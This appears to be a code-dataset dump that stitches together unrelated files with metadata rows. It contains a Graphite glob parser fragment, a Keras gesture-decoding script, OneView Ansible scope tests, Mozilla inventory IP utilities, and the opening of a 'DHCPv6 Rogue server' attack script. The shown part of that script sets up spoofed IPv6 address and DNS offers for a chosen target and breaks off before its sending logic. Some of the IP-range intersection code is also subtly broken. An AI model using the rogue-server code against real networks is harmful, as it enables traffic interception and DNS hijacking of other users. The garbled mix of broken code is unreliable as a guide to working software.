First element: sorted list of Cassandra metrics matched by the glob.
Second element: sorted list of Cassandra directories matched by the glob.
"""
if not _is_valid_glob(graphite_glob):
# TODO(d.forest): should we instead raise an exception?
return ([], [])
glob_re = re.compile(_glob_to_regex(graphite_glob))
if metrics:
metrics = accessor.glob_metric_names(graphite_glob)
metrics = filter(glob_re.match, metrics)
else:
metrics = []
if directories:
directories = accessor.glob_directory_names(graphite_glob)
directories = filter(glob_re.match, directories)
else:
directories = []
return (metrics, directories)
class GlobExpression:
"""Base class for glob expressions."""
def __repr__(self):
return self.__class__.__name__
def __eq__(self, other):
return self.__class__ == other.__class__
class GlobExpressionWithValues(GlobExpression):
"""Base class for glob expressions that have values."""
def __init__(self, values):
"""Take a list of values, and stores the sorted unique values."""
self.values = sorted(set(values))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.values)
def __eq__(self, other):
return (GlobExpression.__eq__(self, other) and
self.values == other.values)
class Globstar(GlobExpression):
"""Represents a globstar wildcard."""
pass
class AnyChar(GlobExpression):
"""Represents any single character."""
pass
class AnySequence(GlobExpression):
"""Represents any sequence of 0 or more characters."""
pass
class SequenceIn(GlobExpressionWithValues):
"""Represents a choice between different character sequences."""
pass
class GraphiteGlobParser:
"""Utility class for parsing graphite glob expressions."""
# TODO(d.forest): upgrade to new tokenizer here
# TODO(d.forest): after upgrade, try to improve Cassandra query generation
def __init__(self):
"""Build a parser, fill in default values."""
self._reset('')
def _commit_sequence(self):
if len(self._sequence) > 0:
self._component.append(self._sequence)
self._sequence = ''
def _commit_component(self):
self._commit_sequence()
if len(self._component) > 0:
self._parsed.append(self._component)
self._component = []
def _parse_char_wildcard(self):
"""Parse single character wildcard."""
self._commit_sequence()
self._component.append(AnyChar())
def _parse_wildcard(self, i, n):
"""Parse multi-character wildcard, and globstar."""
self._commit_sequence()
# Look-ahead for potential globstar
if i < n and self._glob[i] == '*':
self._commit_component()
self._parsed.append(Globstar())
i += 1
else:
self._component.append(AnySequence())
return i
def _find_char_selector_end(self, i, n):
"""Find where a character selector expression ends."""
j = i
if j < n and self._glob[j] == '!':
j += 1
if j < n and self._glob[j] == ']':
j += 1
j = self._glob.find(']', j)
if j == -1:
return n
return j
def _parse_char_selector(self, i, n):
"""Parse character selector, with support for negation and ranges.
For simplicity (and because it does not seem useful at the moment) we
will not be generating the possible values or parsing the ranges, but
outputting AnyChar on valid char selector expressions.
"""
j = self._find_char_selector_end(i, n)
if j < n:
# +1 to skip closing bracket
i = j + 1
self._commit_sequence()
self._component.append(AnyChar())
else:
# Reached end of string: unbalanced bracket
self._sequence += '['
return i
def _parse_sequence_selector(self, i, n):
"""Parse character sequence selector, with support for nesting.
For simplicity, we will be outputting AnySequence in situations where
values contain a character selector.
"""
result = self._parse_sequence_selector_values(i, n)
if result:
has_char_selector, i, values = result
if not has_char_selector and len(values) == 1:
self._sequence += values[0]
else:
if has_char_selector:
seq = AnySequence()
else:
seq = SequenceIn(values)
self._commit_sequence()
self._component.append(seq)
else:
self._sequence += '{'
return i
def _parse_sequence_selector_values(self, i, n):
has_char_selector = False
values = []
curr = []
tmp = ''
j = i
c = ''
while j < n and c != '}':
c = self._glob[j]
j += 1
# Parse sub-expression then combine values with prefixes.
if c == '{':
if tmp != '':
curr.append(tmp)
tmp = ''
result = self._parse_sequence_selector_values(j, n)
if not result:
return None
has_charsel, j, subvalues = result
has_char_selector = has_char_selector or has_charsel
curr = [prefix + x for prefix in curr for x in subvalues]
# End of current element, combine values with suffix.
elif c == ',' or c == '}':
if len(curr) > 0:
values += [x + tmp for x in curr]
else:
values.append(tmp)
curr = []
tmp = ''
# Simplified handling of char selector
elif c == '[':
# XXX(d.forest): We could keep track of depth and just make sure
# the selector expression is well-formed instead
# of continuing to parse everything.
# This is open for later improvement.
k = self._find_char_selector_end(j, n)
if k < n:
has_char_selector = True
j = k + 1
else:
tmp += '['
# Reject dots inside selectors
elif c == '.':
return None
# Append char to the current value.
else:
tmp += c
# We have reached the end without finding a closing brace: the braces
# are unbalanced, expression cannot be parsed as a sequence selector.
if j == n and c != '}':
return None
return has_char_selector, j, values + curr
def _reset(self, glob):
self._glob = glob
self._parsed = []
self._component = []
self._sequence = ''
def parse(self, glob):
"""Parse a graphite glob expression into simple components."""
self._reset(glob)
i = 0
n = len(self._glob)
while i < n:
c = self._glob[i]
i += 1
if c == '?':
self._parse_char_wildcard()
elif c == '*':
i = self._parse_wildcard(i, n)
elif c == '[':
i = self._parse_char_selector(i, n)
elif c == '{':
i = self._parse_sequence_selector(i, n)
elif c == '.':
self._commit_component()
else:
self._sequence += c
self._commit_component()
return self._parsed
|
apache-2.0
| -4,000,647,928,094,152,000 | 29.75969 | 88 | 0.550718 | false | 4.336612 | false | false | false |
AlexGidiotis/Multimodal-Gesture-Recognition-with-LSTMs-and-CTC
|
multimodal_fusion/sequence_decoding.py
|
1
|
3585
|
import pandas as pd
import numpy as np
from operator import itemgetter
from itertools import groupby
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.models import model_from_json
from keras import backend as K
from keras.optimizers import RMSprop
import keras.callbacks
from keras.layers import Input, Lambda
from keras.models import Model
import itertools
from sklearn import preprocessing
from data_generator import DataGenerator
from losses import ctc_lambda_func
def decode_batch(pred_out,f_list):
"""
"""
# Map gesture codes to classes.
map_gest = {0:"oov", 1:"VA", 2:"VQ", 3:"PF", 4:"FU", 5:"CP", 6:"CV",
7:"DC", 8:"SP", 9:"CN", 10:"FN", 11:"OK", 12:"CF", 13:"BS",
14:"PR", 15:"NU", 16:"FM", 17:"TT", 18:"BN", 19:"MC",
20:"ST", 21:"sil"}
# These files are problematic during decoding.
ignore_list = [228,298,299,300,303,304,334,343,373,375]
# Write the output to .mlf
of = open('final_ctc_recout.mlf', 'w')
of.write('#!MLF!#\n')
out = pred_out
ret = []
for j in range(out.shape[0]):
out_prob = list(np.max(out[j, 2:],1))
out_best = list(np.argmax(out[j, 2:],1))
		# Filter the probabilities to keep only the most confident predictions.
		# Build new lists instead of calling list.remove() while iterating,
		# which could drop the wrong elements when values repeat.
		kept = [(p, s) for p, s in zip(out_prob, out_best) if p >= 0.5]
		out_prob = [p for p, _ in kept]
		out_best = [s for _, s in kept]
out_best = [k for k, g in itertools.groupby(out_best)]
outstr = [map_gest[i] for i in out_best]
ret.append(outstr)
f_num = f_list[j]
if int(f_num) in ignore_list:
continue
fileNum = str(format(f_num, '05'))
fileName = 'Sample'+fileNum
of.write('"*/%s.rec"\n' %fileName)
for cl in outstr:
of.write('%s\n' %cl)
of.write('.\n')
of.close()
return ret
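# Illustrative sketch (not part of the original script): a best-path sequence such
# as [1, 1, 21, 7, 7] collapses to [1, 21, 7] via groupby and is mapped to
# ['VA', 'sil', 'DC'] before being written to the .mlf file.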
if __name__ == '__main__':
minibatch_size = 2
maxlen = 1900
nb_classes = 22
nb_epoch = 100
numfeats_speech = 39
numfeats_skeletal = 20
K.set_learning_phase(0)
dataset = raw_input('select train or val: ')
data_gen = DataGenerator(minibatch_size=minibatch_size,
numfeats_speech=numfeats_speech,
numfeats_skeletal=numfeats_skeletal,
maxlen=maxlen,
nb_classes=nb_classes,
dataset=dataset)
input_shape_a = (maxlen, numfeats_speech)
input_shape_s = (maxlen, numfeats_skeletal)
input_data_a = Input(name='the_input_audio', shape=input_shape_a, dtype='float32')
input_data_s = Input(name='the_input_skeletal', shape=input_shape_s, dtype='float32')
json_file = open('multimodal_ctc_blstm_model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.load_weights("multimodal_ctc_lstm_weights_best.h5")
print("Loaded model from disk")
y_pred = loaded_model.get_layer('softmax').output
labels = Input(name='the_labels', shape=[data_gen.absolute_max_sequence_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name="ctc")([y_pred, labels, input_length, label_length])
rmsprop = RMSprop(lr=0.001, clipnorm=5)
# the loss calc occurs elsewhere, so use a dummy lambda func for the loss
loaded_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=rmsprop)
pred_model = Model(inputs=loaded_model.input,
outputs=loaded_model.get_layer('softmax').output)
predictions = pred_model.predict_generator(generator=data_gen.next_val(),
steps=data_gen.get_size(train=False)/minibatch_size,
verbose=1)
f_list = data_gen.get_file_list(train=False)
decoded_res = decode_batch(predictions, f_list)
|
mit
| 6,923,407,496,692,858,000 | 27.228346 | 112 | 0.68954 | false | 2.787714 | false | false | false |
HewlettPackard/oneview-ansible
|
test/test_oneview_scope.py
|
1
|
11066
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import copy
import mock
import pytest
from hpe_test_utils import OneViewBaseTest
from oneview_module_loader import ScopeModule
FAKE_MSG_ERROR = 'Fake message error'
RESOURCE = dict(name='ScopeName', uri='/rest/scopes/id')
RESOURCE_UPDATED = dict(name='ScopeNameRenamed', uri='/rest/scopes/id')
RESOURCE_ASSIGNMENTS = dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-4'])
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name='ScopeName')
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
newName='ScopeNameRenamed')
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_1 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3'])
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_2 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-2'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name='ScopeName')
)
PARAMS_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3']))
)
PARAMS_NO_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=None,
removedResourceUris=None))
)
@pytest.mark.resource(TestScopeModule='scopes')
class TestScopeModule(OneViewBaseTest):
def test_should_create_new_scope_when_not_found(self):
self.resource.get_by_name.return_value = None
self.resource.create.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_PRESENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_CREATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_not_update_when_data_is_equals(self):
response_data = PARAMS_FOR_PRESENT['data']
self.resource.data = response_data
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(scope=response_data)
)
def test_should_not_update_when_no_new_add_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_1['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_2['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_2
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_add_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(RESOURCE_ASSIGNMENTS)
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_data_has_changes(self):
data_merged = PARAMS_FOR_PRESENT.copy()
data_merged['name'] = 'ScopeNameRenamed'
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_remove_scope_when_found(self):
self.resource.get_by_name.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_DELETED
)
def test_should_not_delete_when_scope_not_found(self):
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_ABSENT
)
def test_should_fail_resource_assignments_when_scope_not_found(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
failed=True,
changed=False,
msg=ScopeModule.MSG_RESOURCE_NOT_FOUND
)
def test_should_not_update_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_NO_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
self.resource.update_resource_assignments.return_value = self.resource
self.mock_ansible_module.params = copy.deepcopy(PARAMS_NO_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(scope=PARAMS_NO_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_NOT_UPDATED
)
def test_should_add_and_remove_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_name_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(name='TestScope'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_description_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(description='Test'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
if __name__ == '__main__':
pytest.main([__file__])
|
apache-2.0
| -3,200,483,235,945,231,000 | 34.928571 | 104 | 0.653895 | false | 3.698529 | true | false | false |
rtucker-mozilla/mozilla_inventory
|
core/utils.py
|
1
|
6521
|
from django.db.models import Q
from django.core.exceptions import ValidationError
import ipaddr
import smtplib
from email.mime.text import MIMEText
from settings.local import people_who_need_to_know_about_failures
from settings.local import inventorys_email
# http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html
# Prevent this case http://people.mozilla.com/~juber/public/t1_t2_scenario.txt
def locked_function(lock_name, timeout=10):
def decorator(f):
def new_function(*args, **kwargs):
from django.db import connection
cursor = connection.cursor()
cursor.execute(
"SELECT GET_LOCK('{lock_name}', {timeout});".format(
lock_name=lock_name, timeout=timeout
)
)
ret = f(*args, **kwargs)
cursor.execute(
"SELECT RELEASE_LOCK('{lock_name}');".format(
lock_name=lock_name
)
)
return ret
return new_function
return decorator
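# Example usage (illustrative, not part of the original module); the function
# and model names below are hypothetical:
#
#   @locked_function('inventory.kv_update', timeout=30)
#   def update_keyvalue(obj, key, value):
#       obj.keyvalue_set.create(key=key, value=value)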
def fail_mail(content, subject='Inventory is having issues.',
to=people_who_need_to_know_about_failures,
from_=inventorys_email):
"""Send email about a failure."""
msg = MIMEText(content)
msg['Subject'] = subject
msg['From'] = inventorys_email
# msg['To'] = to
s = smtplib.SMTP('localhost')
s.sendmail(from_, to, msg.as_string())
s.quit()
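# Example usage (illustrative, not part of the original module); the wrapped
# task name is hypothetical:
#
#   try:
#       rebuild_dns_zones()
#   except Exception as e:
#       fail_mail("DNS zone rebuild failed:\n%s" % e,
#                 subject='Inventory DNS rebuild failure')
#       raise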
class IPFilterSet(object):
"""The IPFilterSet expects that all IPFilters added to it are of the same
type. This might be useful later.
"""
def __init__(self):
self.ipfs = []
def add(self, ipf):
self.ipfs.append(ipf)
def pprint(self):
for ipf in self.ipfs:
print ipf
def pprint_intersect(self):
for intersect in self.calc_intersect():
print intersect
    def calc_intersect(self):
        """
        This is where the magic comes from. Given a list of IPFilter objects,
        figure the ranges that are common to all the IPFilters, and create a
        new list of IPFilter objects that represent this range.
        """
        # Minimal sketch (assumption): fold the stored filters through trim()
        # so the result is the range common to every filter added so far.
        if not self.ipfs:
            return []
        common = self.trim(self.ipfs[0], self.ipfs[1:], self.ipfs[0].ip_type)
        return [common] if common else []
def trim(self, r, rs, ip_type):
if not (rs and r):
return r
r1 = rs[0]
rx = self.intersect(r, r1, ip_type)
return self.trim(rx, rs[1:], ip_type)
def intersect(self, r1, r2, ip_type):
"""Cases:
* Subset or equal
* Left intersect
* Right intersect
* No intersect
"""
if r1.start > r2.end:
return None
# We have intersection somewhere.
        if r1.end == r2.end and r1.start == r2.start:
# r1 is subset of r2
# Low High
# r1 |---------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end < r2.end:
# r1 is subset of r2
# Low High
# r1 |-------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end > r2.start:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r1.start_upper, r1.start_lower,
r2.end_upper, r2.end_lower)
if r1.start < r2.start and r1.end < r2.end:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r2.start_upper, r2.start_lower,
r1.end_upper, r1.end_lower)
class IPFilter(object):
def __init__(self, start, end, ip_type, object_=None):
self.object_ = object_ # The composite object (it can be None)
self.ip_type = ip_type
self.start, self.end, self.Q = start_end_filter(start, end, ip_type)
def __str__(self):
return "{0} -- {1}".format(self.start, self.end)
def __repr__(self):
return str(self)
def start_end_filter(start, end, ip_type):
ip_type = ip_type
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
istart = IPKlass(start)
iend = IPKlass(end)
if int(istart) == int(iend):
raise ValidationError("start and end cannot be equal")
elif int(istart) > int(iend):
raise ValidationError("start cannot be greater than end")
start_upper, start_lower = one_to_two(int(istart))
end_upper, end_lower = one_to_two(int(iend))
# Equal uppers. Lower must be within.
if start_upper == end_upper:
q = Q(ip_upper=start_upper,
ip_lower__gte=start_lower,
ip_lower__lte=end_lower,
ip_type=ip_type)
else:
q = Q(ip_upper__gt=start_upper, ip_upper__lt=end_upper,
ip_type=ip_type)
return istart, iend, q
def networks_to_Q(networks):
"""Take a list of network objects and compile a Q that matches any object
that exists in one of those networks."""
q = Q()
for network in networks:
network.update_ipf()
q = q | network.ipf.Q
return q
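# Example usage (illustrative, not part of the original module); AddressRecord
# and Network are hypothetical models with ip_upper/ip_lower/ip_type fields:
#
#   _, _, q = start_end_filter('10.0.0.0', '10.0.0.255', '4')
#   in_range = AddressRecord.objects.filter(q)
#
#   site_q = networks_to_Q(Network.objects.filter(site__name='scl3'))
#   in_site = AddressRecord.objects.filter(site_q)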
def two_to_four(start, end):
start_upper = start >> 64
start_lower = start & (1 << 64) - 1
end_upper = end >> 64
end_lower = end & (1 << 64) - 1
return start_upper, start_lower, end_upper, end_lower
def one_to_two(ip):
return (ip >> 64, ip & (1 << 64) - 1)
def two_to_one(upper, lower):
return long(upper << 64) + long(lower)
def four_to_two(start_upper, start_lower, end_upper, end_lower):
start = (start_upper << 64) + start_lower
end = (end_upper << 64) + end_lower
return start, end
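# Worked example (illustrative, not part of the original module): a 128-bit
# IPv6 integer split into two 64-bit halves and recombined.
#
#   ip = int(ipaddr.IPv6Address('2001:db8::1'))
#   upper, lower = one_to_two(ip)   # upper == 0x20010db800000000, lower == 0x1
#   assert two_to_one(upper, lower) == ip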
def int_to_ip(ip, ip_type):
"""A wrapper that converts a 32 or 128 bit integer into human readable IP
format."""
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
return str(IPKlass(ip))
def resolve_ip_type(ip_str):
if ip_str.find(':') > -1:
Klass = ipaddr.IPv6Network
ip_type = '6'
elif ip_str.find('.') > -1:
Klass = ipaddr.IPv4Network
ip_type = '4'
else:
Klass = None
ip_type = None
return ip_type, Klass
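# Example (illustrative, not part of the original module):
#
#   resolve_ip_type('10.0.0.0/8')     # ('4', ipaddr.IPv4Network)
#   resolve_ip_type('2001:db8::/32')  # ('6', ipaddr.IPv6Network)
#   resolve_ip_type('not-an-ip')      # (None, None)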
def to_a(text, obj):
return "<a href='{0}'>{1}</a>".format(obj.absolute_url(), text)
|
bsd-3-clause
| 522,087,460,123,051,500 | 28.776256 | 78 | 0.535501 | false | 3.534417 | false | false | false |
Vladimir-Ivanov-Git/raw-packet
|
Scripts/DHCP/dhcpv6_rogue_server.py
|
1
|
36326
|
#!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw, UDP_raw, DHCPv6_raw
from tm import ThreadManager
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from random import randint
from time import sleep
from os import errno
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(5)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCPv6 Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-p', '--prefix', type=str, help='Set network prefix', default='fd00::/64')
parser.add_argument('-f', '--first_suffix', type=int, help='Set first suffix client IPv6 for offering', default=2)
parser.add_argument('-l', '--last_suffix', type=int, help='Set last suffix client IPv6 for offering', default=255)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ipv6', type=str, help='Set client Global IPv6 address with MAC in --target_mac',
default=None)
parser.add_argument('-D', '--disable_dhcpv6', action='store_true', help='Do not use DHCPv6 protocol')
parser.add_argument('-d', '--dns', type=str, help='Set recursive DNS IPv6 address', default=None)
parser.add_argument('-s', '--dns_search', type=str, help='Set DNS search list', default="local")
parser.add_argument('--delay', type=int, help='Set delay between packets', default=1)
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
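# Example invocation (illustrative, not part of the original script) using the
# arguments defined above; the interface name and addresses are hypothetical:
#
#   sudo python dhcpv6_rogue_server.py -i eth0 -p fd00::/64 \
#       -t 00:11:22:33:44:55 -T fd00::123 --delay 2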
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
ipv6 = IPv6_raw()
icmpv6 = ICMPv6_raw()
udp = UDP_raw()
dhcpv6 = DHCPv6_raw()
recursive_dns_address = None
target_mac_address = None
target_ipv6_address = None
first_suffix = None
last_suffix = None
clients = {}
icmpv6_router_solicitation_address = "33:33:00:00:00:02"
dhcpv6_requests_address = "33:33:00:01:00:02"
# endregion
# region Disable or Enable DHCPv6 protocol
disable_dhcpv6 = False
if args.disable_dhcpv6:
disable_dhcpv6 = True
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ICMPv6 and DHCPv6 requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have MAC address!"
exit(1)
your_local_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
if your_local_ipv6_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have IPv6 link local address!"
exit(1)
# endregion
# region Create raw socket
global_socket = socket(AF_PACKET, SOCK_RAW)
global_socket.bind((current_network_interface, 0))
# endregion
# region Set search domain and Network prefix
dns_search = args.dns_search
network_prefix = args.prefix
network_prefix_address = network_prefix.split('/')[0]
network_prefix_length = network_prefix.split('/')[1]
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# endregion
# region Target IPv6 is set
if args.target_ipv6 is not None:
if args.target_mac is not None:
if not Base.ipv6_address_validation(args.target_ipv6):
Base.print_error("Bad target IPv6 address in `-T, --target_ipv6` parameter: ", args.target_ipv6)
exit(1)
else:
target_ipv6_address = args.target_ipv6
clients[target_mac_address] = {'advertise address': target_ipv6_address}
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IPv6 address: ", args.target_ipv6)
exit(1)
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
if 1 < args.first_suffix < 65535:
first_suffix = args.first_suffix
else:
Base.print_error("Bad value `-f, --first_suffix`: ", args.first_suffix,
"; first suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
# Check last suffix IPv6 address
if args.last_suffix > first_suffix:
if 1 < args.last_suffix < 65535:
last_suffix = args.last_suffix
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address should be more first suffix IPv6 address: ", str(first_suffix))
exit(1)
# endregion
# endregion
# region Set recursive DNS server address
if args.dns is None:
recursive_dns_address = your_local_ipv6_address
else:
if Base.ipv6_address_validation(args.dns):
recursive_dns_address = args.dns
else:
Base.print_error("Bad DNS server IPv6 address in `--dns` parameter: ", args.dns)
exit(1)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your MAC address: ", your_mac_address)
Base.print_info("Your link local IPv6 address: ", your_local_ipv6_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
if target_ipv6_address is not None:
Base.print_info("Target Global IPv6: ", target_ipv6_address)
else:
Base.print_info("First suffix offer IP: ", str(first_suffix))
Base.print_info("Last suffix offer IP: ", str(last_suffix))
Base.print_info("Prefix: ", network_prefix)
Base.print_info("Router IPv6 address: ", your_local_ipv6_address)
